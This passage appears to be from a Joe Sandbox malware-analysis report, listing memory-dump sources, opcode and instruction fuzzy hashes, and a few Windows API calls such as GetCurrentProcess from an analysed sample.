                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b570972471e1ddef6a898646732605170346343479ba1775fe250e5f534110a7
                                                                                                                                                  • Instruction ID: 3cb0380bb27bfeae7a47313d028144cca8ae8b0b84d229ad290b17c165e2499a
                                                                                                                                                  • Opcode Fuzzy Hash: b570972471e1ddef6a898646732605170346343479ba1775fe250e5f534110a7
                                                                                                                                                  • Instruction Fuzzy Hash: 98A193B5E01218CFEB68CF6AC944B9DFBF2AF89301F14C1A9D408A7254DB749A85CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5eeed7535033b0b178c0f409bc2d7224859ca3c8b00c0967642c4f3322c455b0
                                                                                                                                                  • Instruction ID: fb332ab648cfecdfbf94645af1090210ef8d249478458a5d5c4abf41be67fd95
                                                                                                                                                  • Opcode Fuzzy Hash: 5eeed7535033b0b178c0f409bc2d7224859ca3c8b00c0967642c4f3322c455b0
                                                                                                                                                  • Instruction Fuzzy Hash: F291FF74900218CFEB14DFA9C888B9CBBB1FF49314F609269E409BB3A1DB759985CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 78d54a1b9772ebfa668499ecdd17b5dd907cac92ee47b550a44a82b659e5d725
                                                                                                                                                  • Instruction ID: e7d7cd23e3ba8ce0d4d6aa86e4952bb51b06f04ef6f2f2e0868b8ffcb3883783
                                                                                                                                                  • Opcode Fuzzy Hash: 78d54a1b9772ebfa668499ecdd17b5dd907cac92ee47b550a44a82b659e5d725
                                                                                                                                                  • Instruction Fuzzy Hash: F281AE79E00218CFEB18DFA9D890BADBBB2FB88300F608169D415BB354DB755946CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9672aa9e1419320ece888c19953c3bf99b06c64b20cbba392e6fed36c11197d9
                                                                                                                                                  • Instruction ID: 38aa6efddf11b45f527693e391332a3ae5406584bdb330b6101a7067a6bfc9c1
                                                                                                                                                  • Opcode Fuzzy Hash: 9672aa9e1419320ece888c19953c3bf99b06c64b20cbba392e6fed36c11197d9
                                                                                                                                                  • Instruction Fuzzy Hash: FC81AD75E01218CFEB14DFA9D890AADBBB2FF88300F608169D815BB354DB759946CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bd48c4ca444fc3d7f5218e3ffe7c8eafd6cf34240638163241c511b2ac2f476b
                                                                                                                                                  • Instruction ID: 12a979f3f8d6fa70cecbc7dedadc5f591aec27bf200043edbf6be719d902debd
                                                                                                                                                  • Opcode Fuzzy Hash: bd48c4ca444fc3d7f5218e3ffe7c8eafd6cf34240638163241c511b2ac2f476b
                                                                                                                                                  • Instruction Fuzzy Hash: 6981AF74E01218CFEB08DFA9D890B9DBBB2FB88300F608169D815BB354DB795946CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 21292ac82605a9a65e6b78ef13b9a5a0ed672e2693bf332b39a0d365eaf7ee00
                                                                                                                                                  • Instruction ID: 4665a9f795df1cac2af634a3ce5625c124356a06cf594d02656220f2c86e964b
                                                                                                                                                  • Opcode Fuzzy Hash: 21292ac82605a9a65e6b78ef13b9a5a0ed672e2693bf332b39a0d365eaf7ee00
                                                                                                                                                  • Instruction Fuzzy Hash: D581AE74E01218CFEB14DFA9D990BADBBB2FB88300F608169D415BB354EB355946CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 583c4753201ceb422b2a31e1f119b0071ee5590a9c384f54cced442d5eb8a991
                                                                                                                                                  • Instruction ID: 1c8ae67041e8caff12ec4114a8c027eca531e50e8b8ee8ab5a58c4632fd9cc67
                                                                                                                                                  • Opcode Fuzzy Hash: 583c4753201ceb422b2a31e1f119b0071ee5590a9c384f54cced442d5eb8a991
                                                                                                                                                  • Instruction Fuzzy Hash: 6281C774E00618CFEB18DFA9D894A9DBBF2BF88301F14C069E819AB365DB345945CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b24f8d560ec1b312398596612508d595bb55bf97b80876f0ef6a7e3225f1d578
                                                                                                                                                  • Instruction ID: e77e9b7be5121456fd951a5a70cda9549ca682b1d5f2b43726d3a285d5467778
                                                                                                                                                  • Opcode Fuzzy Hash: b24f8d560ec1b312398596612508d595bb55bf97b80876f0ef6a7e3225f1d578
                                                                                                                                                  • Instruction Fuzzy Hash: E481A474E00358CFDB18DFAAD884A9DBBF2BF89301F14C069D819AB265DB349945CF50
                                                                                                                                                  Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b1c56db34cb3ebce3c6d9ef7ff8de1ade6457dab797fcfd0292bcedb6669bae
• Instruction ID: 35fd448d531fcfe49505cb8a6c603d331bc01be9771408b9da6f45cebd302ffa
• Opcode Fuzzy Hash: 2b1c56db34cb3ebce3c6d9ef7ff8de1ade6457dab797fcfd0292bcedb6669bae
• Instruction Fuzzy Hash: 69819574E00218CFDB18DFA9D884A9DBBF2BF89301F14C06AE819AB365DB749945CF50
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07b5901e9a136304250734da667a7dbfe6da2a7eed84702dbcfe32717ab07f57
• Instruction ID: 7a470d439cde5d79c4ef8f2555de6459b6451c37853f4c96095330dad4db53bc
• Opcode Fuzzy Hash: 07b5901e9a136304250734da667a7dbfe6da2a7eed84702dbcfe32717ab07f57
• Instruction Fuzzy Hash: 1381A874E00218DFEB14DFAAD884A9DBBF2BF89301F14C069D819AB365DB349945CF51
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06662fc9c98dd21b40ee71835ecc219de21e584b31d4e61583616affde65b4d0
• Instruction ID: 9d47a83156a022311da24d5e550d2dcbd779c797752fd9a763f407b130cabb43
• Opcode Fuzzy Hash: 06662fc9c98dd21b40ee71835ecc219de21e584b31d4e61583616affde65b4d0
• Instruction Fuzzy Hash: 6281B674E00618CFDB18DFAAD954A9DBBF2BF89301F14C069D819AB361EB349985CF50
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18446c8ebb1c9fece29408b29fc12d8827d8e8f51f0e0f61b421621cf9b06ffd
• Instruction ID: 52e7188075351ce68bde09c8126f13b4ffdb7e0663291da5310483edff20f509
• Opcode Fuzzy Hash: 18446c8ebb1c9fece29408b29fc12d8827d8e8f51f0e0f61b421621cf9b06ffd
• Instruction Fuzzy Hash: 0781A774E00218CFEB14DFAAD944A9DBBF2BF89305F14C069D819AB365DB349945CF50
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ea91a610e75ff6e6773c4682dac3bf200f33f4f29b09647fff2d9058f8fed511
• Instruction ID: e2cdf55d4a1a2e6f33392450ffb7fa50e67afe641660662ef99c5da86730179c
• Opcode Fuzzy Hash: ea91a610e75ff6e6773c4682dac3bf200f33f4f29b09647fff2d9058f8fed511
• Instruction Fuzzy Hash: F381A774E00658CFEB24DFAAD884A9DBBF2BF89301F14C069D819AB365DB349945CF50
Memory Dump Source
• Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c402660bb33671fe4862d8408b7e530910d66597335a05539a3940a6e635937
• Instruction ID: d8157b8ab794fdb59d7f85f798b985b50e64f2fec290e31c5e0af2a6907b4afc
• Opcode Fuzzy Hash: 1c402660bb33671fe4862d8408b7e530910d66597335a05539a3940a6e635937
• Instruction Fuzzy Hash: 2C9191B4E412298FDB65DF69C954BDDBBB2BF89300F1080EAD819A7250DB315E81CF94
Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9398b1d43741c84ddc1817271c0ceedecb51d7b1be7231c3a622cbbd24b556f
• Instruction ID: 63584de51853b185bba60565459b2c32b2093fc4134b3ced61bc70b0f367fd18
• Opcode Fuzzy Hash: d9398b1d43741c84ddc1817271c0ceedecb51d7b1be7231c3a622cbbd24b556f
• Instruction Fuzzy Hash: 388194B5E016298FEB68CF66C944B9EFBF2AF89300F14C1E9D408A7254DB744A85CF51
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8e847f7df2c65846533b2938e349b43065cc80069fdcc4b7c12d484aa51efdb
• Instruction ID: 71379b62aa511f303513ec31431df32d4f673ad267d7d4b23acc183e8f726cf3
• Opcode Fuzzy Hash: e8e847f7df2c65846533b2938e349b43065cc80069fdcc4b7c12d484aa51efdb
• Instruction Fuzzy Hash: 3A61A475E00208CFEB18DFAAD844A9DBBF2BF88301F14C069E819AB365DB745945CF50
Memory Dump Source
• Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec32daebdddaf755336c21d1bc836922463f49bf9f7fa7ebaa7e1eba84ef0862
• Instruction ID: 410014a21d450dfe8848bd5aa52602d68286ba3029daacc40561a1213995972e
• Opcode Fuzzy Hash: ec32daebdddaf755336c21d1bc836922463f49bf9f7fa7ebaa7e1eba84ef0862
• Instruction Fuzzy Hash: A661CF74E112289FEB64DF6ACD51BEABBB2BB89300F5080E9D51DA7250DB305E85CF40
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b3d5bb478790aeb4c78264d5d0f1ec615d957de2afc8ee52ce28542e6cbcf1b9
• Instruction ID: d7f47784552b5237410ac23c00c6e96794feb71655c7cc5b11bde8203e61f743
• Opcode Fuzzy Hash: b3d5bb478790aeb4c78264d5d0f1ec615d957de2afc8ee52ce28542e6cbcf1b9
• Instruction Fuzzy Hash: 5E518575E00208DFEB18DFAAD894A9DBBF2BF89301F248129E815AB364DB345945CF50
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 821f646cd52205bf6658bfd47035875ddc2a6236a6d13185053f40fdb8740da1
• Instruction ID: f3eb07f827b7bcde062c05c24a7402b6b23d8180e63318618c4f5c0b0bce6e83
• Opcode Fuzzy Hash: 821f646cd52205bf6658bfd47035875ddc2a6236a6d13185053f40fdb8740da1
• Instruction Fuzzy Hash: 7D51A775E00208DFEB18DFAAD894A9DBBF2BF89301F24C129E815AB364DB345945CF50
Memory Dump Source
• Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f00000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ba9bce3924f0a28b54a523af304659fbbdcfb397bb9463773237bf55ebf6f8c
• Instruction ID: 2f19cd41b81115bee9685e17e907a67e1931479c6426bc6125f79d1d2a894b78
• Opcode Fuzzy Hash: 2ba9bce3924f0a28b54a523af304659fbbdcfb397bb9463773237bf55ebf6f8c
• Instruction Fuzzy Hash: B341EEB0E012188BEB18DFAAD8507DEBBF2BF88304F24C16AC418BB254DB754946CF54
Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb450bfecc62fc482f57038100ad709c1a4a4aa0c4e44f02b4b2585cdd9c011f
• Instruction ID: dfa570fb643b68a2ed5698c73d13a428b660151f660d2be57af11c7c7589ab32
• Opcode Fuzzy Hash: bb450bfecc62fc482f57038100ad709c1a4a4aa0c4e44f02b4b2585cdd9c011f
• Instruction Fuzzy Hash: F84156B1E016188FEB58CF6BC9547DAFAF3AFC9204F14C1AAC40DA6264DB750A858F51
Memory Dump Source
• Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f30000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c28b48ed1c3317feee2912724f6e2c4e90305d432d1d964955a22eeac93b437f
• Instruction ID: 665a77468237d4aef0f81cf311a94e6d559f57498885d410f686873df429a7cf
• Opcode Fuzzy Hash: c28b48ed1c3317feee2912724f6e2c4e90305d432d1d964955a22eeac93b437f
• Instruction Fuzzy Hash: B441F575E05248CBEB04DFBAD8506DEBBB2AF89300F10D52AC418BB354EB794906CF54
Memory Dump Source
• Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f30000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40d4a7adb73e4285e73d1d6c74f265e65e6a7b37fc0bc746e150cc1ed889a069
• Instruction ID: 0ceb2964be4ed22c9e53007653de1612f154e867035c400bc017dcaaf192a6a5
• Opcode Fuzzy Hash: 40d4a7adb73e4285e73d1d6c74f265e65e6a7b37fc0bc746e150cc1ed889a069
• Instruction Fuzzy Hash: C841E375E01208CBEB18DFAAD8546DEBBF2BF89300F10C46AC418BB254EB355942CF54
Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 287c3c78e396b1c5cd7d60b0e1d863b14c224f068c9e2ed12af4f6083fe5c6fd
                                                                                                                                                  • Instruction ID: 943f0807929cfd94fb67e1f3eee1d7f95df4bb51aa4eb8ec5917e36cb6b3d0d7
                                                                                                                                                  • Opcode Fuzzy Hash: 287c3c78e396b1c5cd7d60b0e1d863b14c224f068c9e2ed12af4f6083fe5c6fd
                                                                                                                                                  • Instruction Fuzzy Hash: 6B41F375E01248CBEB18DFA6D9546DEBBF2AF89300F20C12AC418BB365DB345945CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0cde1e0876685e947b49692deeca3e855ef167b01b5555dfedc47923aeacd50a
                                                                                                                                                  • Instruction ID: 48e5cef0c928d61bd3df8b865fc438965a413f4dc8d49996a878acc82ec91b19
                                                                                                                                                  • Opcode Fuzzy Hash: 0cde1e0876685e947b49692deeca3e855ef167b01b5555dfedc47923aeacd50a
                                                                                                                                                  • Instruction Fuzzy Hash: 7641F374E002188BEB18CFAAD8546DEBBF2BF89300F14C16AD418BB354EB355946CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 45e9e1650156bd9fb8dc1b0e6900da9f0db75dbd986eb5e9f0cbb12a7ff04220
                                                                                                                                                  • Instruction ID: ecc21831a2daf974aead4a1a8230b1d8de933cae433bff5e0c6f5eec2fb6aa0c
                                                                                                                                                  • Opcode Fuzzy Hash: 45e9e1650156bd9fb8dc1b0e6900da9f0db75dbd986eb5e9f0cbb12a7ff04220
                                                                                                                                                  • Instruction Fuzzy Hash: 3831D175E02648CBEB08DFAAD9506DEBBB2BF89300F54C42AD418BB354DB755902CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d84d858c62a223f61c2e0f682501c2beae2811da3e024a930e6b2f4beaf36e0c
                                                                                                                                                  • Instruction ID: 7212d21ebabb261d33b22f604d792e0852830ce57d4a23402227eb77e88efa90
                                                                                                                                                  • Opcode Fuzzy Hash: d84d858c62a223f61c2e0f682501c2beae2811da3e024a930e6b2f4beaf36e0c
                                                                                                                                                  • Instruction Fuzzy Hash: ED31F5B9E05258CFEB08DFA6D8506DEBBB2BF89300F50C52AC419BB254DB744906CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a655264396cb817389d95842e14dd2f8168e2339eb270fc9a2b45309ccf41ea6
                                                                                                                                                  • Instruction ID: cea18fbb44f64f76481c350060826674b7f2de8bf266e47dcf95da425319d047
                                                                                                                                                  • Opcode Fuzzy Hash: a655264396cb817389d95842e14dd2f8168e2339eb270fc9a2b45309ccf41ea6
                                                                                                                                                  • Instruction Fuzzy Hash: 9431E5B5E016088FDB08DFAAC5406DEBBF6AF89300F64C42AD418BB358DB755942CF55
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8fc2cf669cb3a8a3886ffff0b1d6e9fa5a8784a1a56cf90a641a49b5a3bf9be9
                                                                                                                                                  • Instruction ID: 82f46b1d0a5feefd55d1694fd8e3365b83ec461f1aafc5399a764322eeb20ff3
                                                                                                                                                  • Opcode Fuzzy Hash: 8fc2cf669cb3a8a3886ffff0b1d6e9fa5a8784a1a56cf90a641a49b5a3bf9be9
                                                                                                                                                  • Instruction Fuzzy Hash: 8831B475E052588FEB08DFAAD840ADEBBB2AF89300F10D52AD419BB254EB754906CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2be8e6f91c444714ded1dc97c02e72bccfcfadbd53cd66d154628fdcc77a87fc
                                                                                                                                                  • Instruction ID: 8f3d16f5cfc6b14cda92b2de9ab79ed313cbdde8fdb2d370e7c38fc0348af32f
                                                                                                                                                  • Opcode Fuzzy Hash: 2be8e6f91c444714ded1dc97c02e72bccfcfadbd53cd66d154628fdcc77a87fc
                                                                                                                                                  • Instruction Fuzzy Hash: 3431E5B9E056088FDB08DFAAC5406DEBBF2AF89300F24C42AD418BB354DB345902CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2c357d3dba4204e9d19c6976832d5f75cffce83e87100af80777e1f1d0bfc170
                                                                                                                                                  • Instruction ID: 9262ca62b6834c6e348e9061b54aa3641a3c6309c09405fb3ca18a63f841ca28
                                                                                                                                                  • Opcode Fuzzy Hash: 2c357d3dba4204e9d19c6976832d5f75cffce83e87100af80777e1f1d0bfc170
                                                                                                                                                  • Instruction Fuzzy Hash: 7F310375E012488BEB08DFAAD941ADEBBF2EF89300F24D42AC419BB354DB745902CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8b43ba59bdf39cfd94d4fdd018532bf6cd0e0a3710d23c4f735ec4efdc2dacdf
                                                                                                                                                  • Instruction ID: bf0f8090d062aa1a1059b086ef15f63c19bdd134cbe338eedeb5ef09c075d9fb
                                                                                                                                                  • Opcode Fuzzy Hash: 8b43ba59bdf39cfd94d4fdd018532bf6cd0e0a3710d23c4f735ec4efdc2dacdf
                                                                                                                                                  • Instruction Fuzzy Hash: BE31E775E012088BEB08DFAAC5416DEBBF3AF89300F64D42AD418BB354EB355942CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bbb212613818518f875ffb5c5041689703463f4fdc77eebf91f9be5c9b9d6608
                                                                                                                                                  • Instruction ID: c6ead0da2d867c1559d3ad7727d22d73c68d953773b73cfd0196b075fe2c672f
                                                                                                                                                  • Opcode Fuzzy Hash: bbb212613818518f875ffb5c5041689703463f4fdc77eebf91f9be5c9b9d6608
                                                                                                                                                  • Instruction Fuzzy Hash: 0E31C274E042188FDB14CFAAD95469EBBB2BF89300F14D56AC418AB254EB754942CF84

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB89E
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 360BB8DB
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB918
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 360BB971
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: c41ea48e0d3037dc911056e51b56fedf1d71223d47c8989080e1501392ffefce
                                                                                                                                                  • Instruction ID: 3e733487123c0712291319744c942801cf79964278d446940b60cc2a79406703
                                                                                                                                                  • Opcode Fuzzy Hash: c41ea48e0d3037dc911056e51b56fedf1d71223d47c8989080e1501392ffefce
                                                                                                                                                  • Instruction Fuzzy Hash: 015164B09007498FDB04CFAAC945BDEBFF2EF89300F248499E508A7361DB749945CB62

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB89E
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 360BB8DB
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 360BB918
